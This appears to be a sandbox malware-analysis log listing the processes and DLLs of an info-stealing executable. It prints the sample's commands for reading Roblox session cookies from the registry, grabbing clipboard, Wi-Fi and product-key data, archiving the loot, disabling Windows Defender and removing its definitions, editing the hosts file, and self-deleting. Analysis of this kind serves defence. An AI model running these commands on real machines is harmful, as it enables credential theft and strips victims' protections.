              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Users\user\Desktop\KpHYfxnJs6.exe "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe""
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\getmac.exe getmac
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: python3.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: libffi-8.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: sqlite3.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: libssl-1_1.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: avicap32.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: msvfw32.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: winmm.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: winmm.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: dciman32.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: mmdevapi.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: devobj.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: ksuser.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: avrt.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: audioses.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: powrprof.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: umpdc.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: msacm32.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: midimap.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
